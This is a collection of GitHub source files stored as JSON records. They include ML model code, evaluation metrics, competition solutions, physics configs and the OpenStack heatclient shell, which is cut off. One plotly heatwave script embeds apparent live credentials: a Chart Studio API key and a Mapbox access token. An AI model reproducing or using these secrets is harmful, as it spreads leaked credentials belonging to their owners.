s.text]\n else:\n out = []\n for sec in sections:\n part = {'title':sec.text, 'text':self.get_sections(sec.parent, level+1)}\n if part['text']:\n out.append(part)\n return out","repo_name":"nikitcha/open_parser","sub_path":"open_parser/plos.py","file_name":"plos.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611295071","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport keras\n\nimport numpy as np\nfrom nvidia_tao_tf1.core.models.templates.rnn_conv2d_base import RNNConv2dBase\nimport tensorflow as tf\n\n\nclass RNNConv2d(RNNConv2dBase):\n \"\"\"Convolutional RNN Module.\"\"\"\n\n TYPE_NAME = \"RNN\"\n\n def _get_id_init(self):\n return \"glorot_uniform\"\n\n def build(self, input_shapes):\n \"\"\"Builds the RNN module.\n\n NOTE: Subclasses can modify the initial recurrent matrix by overriding `_get_id_init`.\n \"\"\"\n input_shape = input_shapes[0]\n n_input_shape = self._get_normalized_size(input_shape)\n\n self.W_x = self.add_weight(\n name=\"W_x\",\n shape=[\n self.kernel_size[0],\n self.kernel_size[1],\n n_input_shape[1],\n self.filters,\n ],\n initializer=\"glorot_uniform\",\n trainable=True,\n regularizer=self.kernel_regularizer,\n )\n\n self.W_h = self.add_weight(\n name=\"W_h\",\n shape=self._get_hidden_shape(),\n initializer=self._get_id_init(),\n trainable=True,\n regularizer=self.kernel_regularizer,\n )\n\n self.bias = self.add_weight(\n name=\"bias\",\n shape=self._cvt_to_df([1, self.filters, 1, 1]),\n initializer=\"zeros\",\n trainable=True,\n regularizer=self.bias_regularizer,\n )\n\n super(RNNConv2d, self).build(input_shapes)\n\n def iteration(self, x, state):\n \"\"\"\n Implements the recurrent activation on a single timestep.\n\n Args:\n x (tf.Tensor): The input tensor for the current timestep.\n state (tf.Tensor): The state of the recurrent module, up to the current timestep.\n\n Returns:\n state (tf.Tensor): The state of the recurrent module after processing this timestep.\n \"\"\"\n state = state * self.state_scaling\n\n z = self._conv2d(x, self.W_x) + self._conv2d(state, self.W_h)\n z = self._bias_add(z, self.bias)\n z = self._activation(z, name=\"state_output\" if self.is_export_mode else None)\n\n state = z\n\n return state\n\n def _activation(self, inputs, name=None):\n return keras.layers.Activation(self.activation_type, name=name)(inputs)\n\n\nclass IRNNConv2d(RNNConv2d):\n \"\"\"Convolutional RNN module with identity initialization.\"\"\"\n\n TYPE_NAME = \"IRNN\"\n\n def _get_id_init(self):\n shape = self._get_hidden_shape()\n np_init = 0.01 * np.random.randn(*shape)\n c_y = shape[0] // 2\n c_x = shape[1] // 2\n\n np_init[c_y, c_x, :, :] += np.identity(self.filters)\n\n return tf.compat.v1.initializers.constant(value=np_init)\n\n def _activation(self, inputs, name=None):\n return tf.nn.relu(inputs, name=name)\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/models/templates/rnn_conv2d.py","file_name":"rnn_conv2d.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"26898728905","text":"import os\n\nfrom fate_arch.common import file_utils\n\n\ndef get_data_table_count(path):\n count = 0\n config_path = os.path.join(path, \"config.yaml\")\n if not os.path.exists(config_path):\n return count\n config = file_utils.load_yaml_conf(conf_path=config_path)\n if config:\n if config.get(\"type\") != \"vision\":\n raise Exception(f\"can not support this type {config.get('type')}\")\n ext = config.get(\"inputs\").get(\"ext\")\n base_dir = os.path.join(path, \"images\")\n for file_name in os.listdir(base_dir):\n if file_name.endswith(ext):\n count += 1\n return count\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_arch/common/path_utils.py","file_name":"path_utils.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40621723560","text":"import logging\nfrom sklearn.metrics import accuracy_score\nfrom sklearn import metrics\nimport pandas as pd\nimport sys\n\ndef evalualte(y_test, y_pred, y_pred_score =None):\n accuracy = accuracy_score(y_test, y_pred)\n # score_train = accuracy_score(y_train, y_pred_train)\n if y_pred_score is None:\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred, pos_label=1)\n else:\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred_score, pos_label=1)\n auc = metrics.auc(fpr, tpr)\n # auc2 = metrics.roc_auc_score(y_test, y_pred_score)\n f1 = metrics.f1_score(y_test, y_pred)\n precision = metrics.precision_score(y_test, y_pred)\n recall = metrics.recall_score(y_test, y_pred)\n # logging.info( metrics.classification_report(y_test, y_pred))\n # print '--score: ', accuracy, 'percision: ', percision,'auc1: ', auc, 'f1: ', f1\n from sklearn.metrics import average_precision_score\n aupr = average_precision_score(y_test, y_pred_score)\n # logging.info( '--accuracy: {0:.2f} percision: {1:.2f} auc: {2:.2f} f1: {3:.2f} aupr {4:.2f}'.format(accuracy, precision, auc, f1, aupr) )\n # print ('--------------------------------------------')\n score = {}\n score['accuracy'] = accuracy\n score['precision'] = precision\n score['auc'] = auc\n score['f1'] = f1\n score['aupr'] = aupr\n score['recall'] = recall\n # logging.info(score)\n # score['aupr'] = aupr\n return score\n\n\nimport numpy as np\ndef compute_metrics(p): \n pred, labels = p\n pred = np.argmax(pred, axis=1)\n accuracy = accuracy_score(y_true=labels, y_pred=pred)\n recall = metrics.recall_score(y_true=labels, y_pred=pred)\n precision = metrics.precision_score(y_true=labels, y_pred=pred)\n f1 = metrics.f1_score(y_true=labels, y_pred=pred) \n return {\"accuracy\": accuracy, \"precision\": precision, \"recall\": recall, \"f1\": f1}\n\nif __name__ == \"__main__\":\n filename= sys.argv[1:]\n df = pd.read_csv(filename)\n evalualte(df['truth'], df['pred'], df['score'])","repo_name":"marakeby/clinicalNLP2","sub_path":"utils/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5296589798","text":"from sys import stdin, stdout\nwhile(True):\n try:\n duration, down_payment, loan, records = map(float, stdin.readline().split())\n except:\n break\n if duration < 0:\n break\n duration = int(duration)\n records = int(records)\n dep_percent = [None] * (duration+1)\n for _ in range(records):\n index, percent = map(float, stdin.readline().split())\n index = int(index)\n dep_percent[index] = percent\n prev_dep = dep_percent[0]\n for x in range(0, duration+1):\n if dep_percent[x] is None:\n dep_percent[x] = prev_dep\n else:\n prev_dep = dep_percent[x]\n \n value = down_payment + loan\n month = 0\n value = value - (dep_percent[month] * value)\n owes = loan\n print(dep_percent)\n print(value, owes)\n while(value < owes):\n month+=1\n value = value - (dep_percent[month] * value)\n owes = owes - down_payment\n print(value, owes)\n if month == 1:\n print(\"1 month\")\n else:\n print(str(month)+ \" months\")","repo_name":"Udit107710/CompetitiveCoding","sub_path":"UVA/10114 - Loansome Car Buyer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18767875770","text":"import FWCore.ParameterSet.Config as cms\n\nfrom HighMassAnalysis.Skimming.tauSelector_cfi import *\nfrom HighMassAnalysis.Skimming.elecSelector_cfi import *\n\nelecTauPairs = cms.EDProducer(\"DeltaRMinCandCombiner\",\n decay = cms.string('selectedLooseHPSPatTau@+ selectedElectrons@-'),\n checkCharge = cms.bool(False),\n cut = cms.string( ''),\n name = cms.string('etauCandidates'),\n deltaRMin = cms.double(0.3)\n)\n\nselectedElecTauPairs = cms.EDFilter(\"CandViewCountFilter\",\n src = cms.InputTag('elecTauPairs'),\n minNumber = cms.uint32(1) \n)\n\nelecTauSkimSequence = cms.Sequence(\n ( selectedLooseHPSPatTau + selectedElectrons )\n * elecTauPairs\n * selectedElecTauPairs\n)\n","repo_name":"amkalsi/ForPriyanka","sub_path":"HighMassAnalysis/Skimming/python/elecTauSkimSequence_cff.py","file_name":"elecTauSkimSequence_cff.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463312423","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestKlayFeeHistory(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.blockCount = \"0x10\"\n self.lastBlock = \"latest\"\n self.rewardPercentiles = [0.1, 0.2, 0.3]\n\n def test_post(self):\n self.response = self.w3.klay.fee_history(\n self.blockCount, self.lastBlock, self.rewardPercentiles\n )\n self.assertRegex(self.response[\"oldestBlock\"], r'^0x.*$')\n\n def test_post_wrong_with_lack_paramaters(self):\n with self.assertRaises(ValueError):\n self.response = self.w3.klay.fee_history(self.lastBlock)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/gas/test_fee_history.py","file_name":"test_fee_history.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"31519740031","text":"import pandas as pd\r\nimport plotly.graph_objects as go\r\nimport chart_studio\r\nimport chart_studio.plotly as py\r\nimport chart_studio.tools as tls\r\ndfhw = pd.read_csv('heatwaves.csv')\r\n\r\nimport plotly.express as px\r\n\r\nusername = 'mlavrenk'\r\napi_key = 'flp8Ee4Nhl0cInQtZ6rt'\r\n\r\nchart_studio.tools.set_credentials_file(username=username, api_key= api_key)\r\n\r\nfig = px.density_mapbox(dfhw, lat='Latitude', lon='Longitude', z='Change', radius=50, center=dict(lat=39.49, lon=-98.95734), zoom =3, mapbox_style=\"stamen-terrain\",)\r\nfig.update_layout(mapbox_style=\"light\", mapbox_accesstoken='pk.eyJ1IjoiYXNod2luZGVzaCIsImEiOiJjbGQ2Nm9jZ2UwZHhyM3FzZGhmZ2U5bGNrIn0.ShkpAMGCM3RNz0SX3If1CQ', margin={\"r\":0,\"l\":0,\"b\":0,\"t\":0},)\r\nduration = px.density_mapbox(dfhw.dropna(subset=['Duration Change']), lat='Latitude', lon='Longitude', z='Duration Change', radius=50, center=dict(lat=39.49, lon=-98.95734), zoom =3, mapbox_style=\"stamen-terrain\", labels={'Duration Change'})\r\nfig.add_trace(duration['data'][0])\r\n\r\nfig.update_coloraxes(colorbar_yanchor=\"top\", colorbar_xanchor=\"left\", colorbar_x=0, colorbar_y=1)\r\n\r\nfig.update_layout(\r\n updatemenus=[\r\n go.layout.Updatemenu(\r\n active=0,\r\n type = 'dropdown',\r\n y = 1,\r\n x=0.7,\r\n buttons=list([\r\n dict(label=\"Intensity Change in Heat Waves\",\r\n method=\"update\",\r\n args=[{\"visible\": [True, False]},\r\n {\"title\": \"Intensity Change\"}]),\r\n\r\n dict(label=\"Duration Change in Heat Waves\",\r\n method=\"update\",\r\n args=[{\"visible\": [False, True]},\r\n {\"title\": \"Duration Change\"}]),\r\n ]),\r\n ),\r\n ]\r\n)\r\n\r\npy.plot(fig, filename = 'heat waves2', auto_open = True)\r\n\r\nfig.show()","repo_name":"tgondil/BoilerMap","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7055327939","text":"# Problem No.: 18783\n# Solver: Jinmin Goh\n# Date: 20200713\n# URL: https://www.acmicpc.net/problem/18783\n\nimport sys\n\ndef main():\n n, m, k = map(int, input().split())\n nums = []\n for _ in range(m):\n nums.append(list(map(int, sys.stdin.readline().split())))\n \n change = [_ + 1 for _ in range(n)]\n #ans = [_ + 1 for _ in range(n)]\n \n # find final change result for single m-process\n for i in range(m):\n temp = list(reversed(change[nums[i][0] - 1:nums[i][1]]))\n change[nums[i][0] - 1:nums[i][1]] = temp\n #print(change)\n\n changeList = [None] * n # list of changing sequences for each numbers\n cycleList = [] # list of cycles\n for i in range(n):\n if changeList[i] != None:\n continue\n # find cycle\n start = i + 1\n tempCycle = [start]\n temp = change[start - 1]\n #print(start, tempCycle, temp)\n while temp != start:\n tempCycle.append(temp)\n temp = change[temp - 1]\n #print(tempCycle)\n # add change list\n cycleList.append(tempCycle[:])\n for j in range(len(tempCycle)):\n changeList[tempCycle[j] - 1] = [j, len(cycleList) - 1]\n \n for i in range(n):\n print(cycleList[changeList[i][1]][(changeList[i][0] + k) % len(cycleList[changeList[i][1]])])\n \n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/18783/18783.py","file_name":"18783.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35225303903","text":"import os \nimport json\nimport numpy as np \n\n\n_obj = open(os.path.join(os.path.dirname(__file__),\"data_folder\", \"all_widths.json\"),'rt')\nwidth_dict = json.load(_obj)\n_obj.close()\n\ndef get_width(param, mode):\n subdict = width_dict[param]\n for entry in subdict:\n if str(mode).lower()==entry[\"mode0\"]:\n return entry[\"width\"]\n \n for entry in subdict:\n raise Exception()\n print(str(mode))\n \ncor_file = os.path.join(os.path.dirname(__file__), \"data_folder\", \"ice_covariance.json\")\n_obj = open(cor_file, 'rt')\ncor_dict = json.load(_obj)\n_obj.close()\n\nparam_types = [\"Amp\", \"Phs\"]\nmodes = [0,1,2,3,4]\nall_widths = []\nfor param in param_types:\n for mode in modes:\n if param==\"Phs\" and mode==0:\n continue\n all_widths.append( get_width(param, mode) )\nall_widths = np.array(all_widths)\n\n# load correlation matrix in \ncorrelation = np.zeros(shape=(9,9))\nfor i, key in enumerate(cor_dict.keys()):\n for j, subkey in enumerate(cor_dict.keys()):\n correlation[i][j] = cor_dict[key][subkey] ","repo_name":"BenSmithers/universalGradients","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4395574259","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nCommand-line interface to the Heat API.\n\"\"\"\n\nimport argparse\nimport logging\nimport sys\n\nfrom keystoneauth1.identity import generic\nfrom keystoneauth1 import session as kssession\nfrom oslo_utils import encodeutils\nfrom oslo_utils import importutils\n\nimport heatclient\nfrom heatclient._i18n import _\nfrom heatclient import client as heat_client\nfrom heatclient.common import utils\nfrom heatclient import exc\n\nosprofiler_profiler = importutils.try_import(\"osprofiler.profiler\")\n\n\nclass HeatShell(object):\n\n def _append_global_identity_args(self, parser):\n # FIXME(gyee): these are global identity (Keystone) arguments which\n # should be consistent and shared by all service clients. Therefore,\n # they should be provided by python-keystoneclient. We will need to\n # refactor this code once this functionality is available in\n # python-keystoneclient.\n parser.add_argument(\n '-k', '--insecure', default=False, action='store_true',\n help=_('Explicitly allow heatclient to perform '\n '\\\"insecure SSL\\\" (https) requests. '\n 'The server\\'s certificate will not be verified '\n 'against any certificate authorities. '\n 'This option should be used with caution.'))\n\n parser.add_argument(\n '--os-cert',\n default=utils.env('OS_CERT'),\n help=_('Path of certificate file to use in SSL connection. '\n 'This file can optionally be prepended with '\n 'the private key.'))\n\n # for backward compatibility only\n parser.add_argument('--cert-file',\n dest='os_cert',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-cert'})\n\n parser.add_argument('--os-key',\n default=utils.env('OS_KEY'),\n help=_('Path of client key to use in SSL '\n 'connection. This option is not necessary '\n 'if your key is prepended to your cert '\n 'file.'))\n\n parser.add_argument('--key-file',\n dest='os_key',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-key'})\n\n parser.add_argument('--os-cacert',\n metavar='',\n dest='os_cacert',\n default=utils.env('OS_CACERT'),\n help=_('Path of CA TLS certificate(s) used to '\n 'verify the remote server\\'s certificate. '\n 'Without this option glance looks for the '\n 'default system CA certificates.'))\n\n parser.add_argument('--ca-file',\n dest='os_cacert',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-cacert'})\n\n parser.add_argument('--os-username',\n default=utils.env('OS_USERNAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USERNAME]'\n })\n\n parser.add_argument('--os_username',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-id',\n default=utils.env('OS_USER_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_ID]'\n })\n\n parser.add_argument('--os_user_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-domain-id',\n default=utils.env('OS_USER_DOMAIN_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_DOMAIN_ID]'\n })\n\n parser.add_argument('--os_user_domain_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-domain-name',\n default=utils.env('OS_USER_DOMAIN_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_DOMAIN_NAME]'\n })\n\n parser.add_argument('--os_user_domain_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-id',\n default=utils.env('OS_PROJECT_ID'),\n help=(_('Another way to specify tenant ID. '\n 'This option is mutually exclusive with '\n '%(arg)s. Defaults to %(value)s.') %\n {\n 'arg': '--os-tenant-id',\n 'value': 'env[OS_PROJECT_ID]'}))\n\n parser.add_argument('--os_project_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-name',\n default=utils.env('OS_PROJECT_NAME'),\n help=(_('Another way to specify tenant name. '\n 'This option is mutually exclusive with '\n '%(arg)s. Defaults to %(value)s.') %\n {\n 'arg': '--os-tenant-name',\n 'value': 'env[OS_PROJECT_NAME]'}))\n\n parser.add_argument('--os_project_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-domain-id',\n default=utils.env('OS_PROJECT_DOMAIN_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PROJECT_DOMAIN_ID]'\n })\n\n parser.add_argument('--os_project_domain_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-domain-name',\n default=utils.env('OS_PROJECT_DOMAIN_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PROJECT_DOMAIN_NAME]'\n })\n\n parser.add_argument('--os_project_domain_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-password',\n default=utils.env('OS_PASSWORD'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PASSWORD]'\n })\n\n parser.add_argument('--os_password',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-tenant-id',\n default=utils.env('OS_TENANT_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_TENANT_ID]'\n })\n\n parser.add_argument('--os_tenant_id',\n default=utils.env('OS_TENANT_ID'),\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-tenant-name',\n default=utils.env('OS_TENANT_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_TENANT_NAME]'\n })\n\n parser.add_argument('--os_tenant_name',\n default=utils.env('OS_TENANT_NAME'),\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-auth-url',\n default=utils.env('OS_AUTH_URL'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_AUTH_URL]'\n })\n\n parser.add_argument('--os_auth_url',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-region-name',\n default=utils.env('OS_REGION_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_REGION_NAME]'\n })\n\n parser.add_argument('--os_region_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-auth-token',\n default=utils.env('OS_AUTH_TOKEN'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_AUTH_TOKEN]'\n })\n\n parser.add_argument('--os_auth_token',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-service-type',\n default=utils.env('OS_SERVICE_TYPE'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_SERVICE_TYPE]'\n })\n\n parser.add_argument('--os_service_type',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-endpoint-type',\n default=utils.env('OS_ENDPOINT_TYPE'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_ENDPOINT_TYPE]'\n })\n\n parser.add_argument('--os_endpoint_type',\n help=argparse.SUPPRESS)\n\n def get_base_parser(self):\n parser = argparse.ArgumentParser(\n prog='heat',\n description=__doc__.strip(),\n epilog=_('See \"%(arg)s\" for help on a specific command.') % {\n 'arg': 'heat help COMMAND'\n },\n add_help=False,\n formatter_class=HelpFormatter,\n )\n\n # Global arguments\n parser.add_argument('-h', '--help',\n action='store_true',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--version',\n action='version',\n version=heatclient.__version__,\n help=_(\"Shows the client version and exits.\"))\n\n parser.add_argument('-d', '--debug',\n default=bool(utils.env('HEATCLIENT_DEBUG')),\n action='store_true',\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[HEATCLIENT_DEBUG]'\n })\n\n parser.add_argument('-v', '--verbose',\n default=False, action=\"store_true\",\n help=_(\"Print more verbose output.\"))\n\n parser.add_argument('--api-timeout',\n help=_('Number of seconds to wait for an '\n 'API response, '\n 'defaults to system socket timeout'))\n\n # os-no-client-auth tells heatclient to use token, instead of\n # env[OS_AUTH_URL]\n parser.add_argument('--os-no-client-auth',\n default=utils.env('OS_NO_CLIENT_AUTH'),\n action='store_true',\n help=(_(\"Do not contact keystone for a token. \"\n \"Defaults to %(value)s.\") %\n {'value': 'env[OS_NO_CLIENT_AUTH]'}))\n\n parser.add_argument('--heat-url',\n default=utils.env('HEAT_URL'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[HEAT_URL]'\n })\n\n parser.add_argument('--heat_url',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--heat-api-version',\n default=utils.env('HEAT_API_VERSION', default='1'),\n help=_('Defaults to %(value)s or 1.') % {\n 'value': 'env[HEAT_API_VERSION]'\n })\n\n parser.add_argument('--heat_api_version',\n help=argparse.SUPPRESS)\n\n # This unused option should remain so that scripts that\n # use it do not break. It is suppressed so it will not\n # appear in the help.\n parser.add_argument('-t', '--token-only',\n default=bool(False),\n action='store_true',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--include-password',\n default=bool(utils.env('HEAT_INCLUDE_PASSWORD')),\n action='store_true',\n help=_('Send %(arg1)s and %(arg2)s to heat.') % {\n 'arg1': 'os-username',\n 'arg2': 'os-password'\n })\n\n # FIXME(gyee): this method should come from python-keystoneclient.\n # Will refactor this code once it is available.\n # https://bugs.launchpad.net/python-keystoneclient/+bug/1332337\n\n self._append_global_identity_args(parser)\n\n if osprofiler_profiler:\n parser.add_argument(\n '--profile',\n metavar='HMAC_KEY',\n help=_('HMAC key to use for encrypting context data '\n 'for performance profiling of operation. '\n 'This key should be the value of HMAC key '\n 'configured in osprofiler middleware in heat, '\n 'it is specified in the paste configuration '\n '(/etc/heat/api-paste.ini). Without the key, '\n 'profiling will not be triggered '\n 'even if osprofiler is enabled on server side.'))\n return parser\n\n def get_subcommand_parser(self, version):\n parser = self.get_base_parser()\n\n self.subcommands = {}\n subparsers = parser.add_subparsers(metavar='')\n submodule = importutils.import_versioned_module('heatclient',\n version, 'shell')\n self._find_actions(subparsers, submodule)\n self._find_actions(subparsers, self)\n self._add_bash_completion_subparser(subparsers)\n\n return parser\n\n def _add_bash_completion_subparser(self, subparsers):\n subparser = subparsers.add_parser(\n 'bash_completion',\n add_help=False,\n formatter_class=HelpFormatter\n )\n self.subcommands['bash_completion'] = subparser\n subparser.set_defaults(func=self.do_bash_completion)\n\n def _find_actions(self, subparsers, actions_module):\n for attr in (a for a in dir(actions_module) if a.startswith('do_')):\n # I prefer to be hyphen-separated instead of underscores.\n command = attr[3:].replace('_', '-')\n callback = getattr(actions_module, attr)\n desc = callback.__doc__ or ''\n help = desc.strip().split('\\n')[0]\n arguments = getattr(callback, 'arguments', [])\n\n subparser = subparsers.add_parser(command,\n help=help,\n description=desc,\n add_help=False,\n formatter_class=HelpFormatter)\n subparser.add_argument('-h', '--help',\n action='help',\n help=argparse.SUPPRESS)\n self.subcommands[command] = subparser\n for (args, kwargs) in arguments:\n subparser.add_argument(*args, **kwargs)\n subparser.set_defaults(func=callback)\n\n def _setup_logging(self, debug):\n log_lvl = logging.DEBUG if debug else logging.WARNING\n logging.basicConfig(\n format=\"%(levelname)s (%(module)s) %(message)s\",\n level=log_lvl)\n logging.getLogger('iso8601').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n def _setup_verbose(self, verbose):\n if verbose:\n exc.verbose = 1\n\n def _get_keystone_session(self, **kwargs):\n # first create a Keystone session\n cacert = kwargs.pop('cacert', None)\n cert = kwargs.pop('cert', None)\n key = kwargs.pop('key', None)\n insecure = kwargs.pop('insecure', False)\n timeout = kwargs.pop('timeout', None)\n verify = kwargs.pop('verify', None)\n\n if verify is None:\n if insecure:\n verify = False\n else:\n # TODO(gyee): should we do\n # heatclient.common.http.get_system_ca_fle()?\n verify = cacert or True\n if cert and key:\n # passing cert and key together is deprecated in favour of the\n # requests lib form of having the cert and key as a tuple\n cert = (cert, key)\n\n return kssession.Session(verify=verify, cert=cert, timeout=timeout)\n\n def main(self, argv):\n # Parse args once to find version\n parser = self.get_base_parser()\n (options, args) = parser.parse_known_args(argv)\n self._setup_logging(options.debug)\n self._setup_verbose(options.verbose)\n\n # build available subcommands based on version\n api_version = options.heat_api_version\n subcommand_parser = self.get_subcommand_parser(api_version)\n self.parser = subcommand_parser\n\n # Handle top-level --help/-h before attempting to parse\n # a command off the command line\n if not args and options.help or not argv:\n self.do_help(options)\n return 0\n\n # Parse args again and call whatever callback was selected\n args = subcommand_parser.parse_args(argv)\n\n # Short-circuit and deal with help command right away.\n if args.func == self.do_help:\n self.do_help(args)\n return 0\n elif args.func == self.do_bash_completion:\n self.do_bash_completion(args)\n return 0\n\n if not args.os_username and not args.os_auth_token:\n raise exc.CommandError(_(\"You must provide a username via either \"\n \"--os-username or env[OS_USERNAME] \"\n \"or a token via --os-auth-token or \"\n \"env[OS_AUTH_TOKEN]\"))\n\n if not args.os_password and not args.os_auth_token:\n raise exc.CommandError(_(\"You must provide a password via either \"\n \"--os-password or env[OS_PASSWORD] \"\n \"or a token via --os-auth-token or \"\n \"env[OS_AUTH_TOKEN]\"))\n\n if args.os_no_client_auth:\n if not args.heat_url:\n raise exc.CommandError(_(\"If you specify --os-no-client-auth \"\n \"you must also specify a Heat API \"\n \"URL via either --heat-url or \"\n \"env[HEAT_URL]\"))\n else:\n # Tenant/project name or ID is needed to make keystoneclient\n # retrieve a service catalog, it's not required if\n # os_no_client_auth is specified, neither is the auth URL\n\n if not (args.os_tenant_id or args.os_tenant_name or\n args.os_project_id or args.os_project_name):\n raise exc.CommandError(\n _(\"You must provide a tenant id via either \"\n \"--os-tenant-id or env[OS_TENANT_ID] or a tenant name \"\n \"via either --os-tenant-name or env[OS_TENANT_NAME] \"\n \"or a project id via either --os-project-id or \"\n \"env[OS_PROJECT_ID] or a project name via \"\n \"either --os-project-name or env[OS_PROJECT_NAME]\"))\n\n if not args.os_auth_url:\n raise exc.CommandError(_(\"You must provide an auth url via \"\n \"either --os-auth-url or via \"\n \"env[OS_AUTH_URL]\"))\n kwargs = {\n 'insecure': args.insecure,\n 'cacert': args.os_cacert,\n 'cert': args.os_cert,\n 'key': args.os_key,\n 'timeout': args.api_timeout\n }\n\n service_type = args.os_service_type or 'orchestration'\n if args.os_no_client_auth:\n # Do not use session since no_client_auth means using heat to\n # to authenticate\n kwargs = {\n 'username': args.os_username,\n 'password': args.os_password,\n 'auth_url': args.os_auth_url,\n 'token': args.os_auth_token,\n 'include_pass': args.include_password,\n 'insecure': args.insecure,\n 'timeout': args.api_timeout,\n 'endpoint': args.heat_url\n }\n else:\n keystone_session = self._get_keystone_session(**kwargs)\n endpoint_type = args.os_endpoint_type or 'publicURL'\n if args.os_auth_token:\n kwargs = {\n 'token': args.os_auth_token,\n 'auth_url': args.os_auth_url\n }\n keystone_auth = generic.Token(**kwargs)\n else:\n project_id = args.os_project_id or args.os_tenant_id\n project_name = args.os_project_name or args.os_tenant_name\n kwargs = {\n 'username': args.os_username,\n 'user_id': args.os_user_id,\n 'user_domain_id': args.os_user_domain_id,\n 'user_domain_name': args.os_user_domain_name,\n 'password': args.os_password,\n 'auth_url': args.os_auth_url,\n 'project_id': project_id,\n 'project_name': project_name,\n 'project_domain_id': args.os_project_domain_id,\n 'project_domain_name': args.os_project_domain_name,\n }\n keystone_auth = generic.Password(**kwargs)\n\n kwargs = {\n 'auth_url': args.os_auth_url,\n 'session': keystone_session,\n 'auth': keystone_auth,\n 'service_type': service_type,\n 'endpoint_type': endpoint_type,\n 'region_name': args.os_region_name,\n 'username': args.os_username,\n 'password': args.os_password,\n 'include_pass': args.include_password,\n 'endpoint_override': args.heat_url,\n }\n\n client = heat_client.Client(api_version, **kwargs)\n\n profile = osprofiler_profiler and options.profile\n if profile:\n osprofiler_profiler.init(options.profile)\n\n args.func(client, args)\n\n if profile:\n trace_id = osprofiler_profiler.get().get_base_id()\n print(_(\"Trace ID: %s\") % trace_id)\n print(_(\"To display trace use next command:\\n\"\n \"osprofiler trace show --html %s 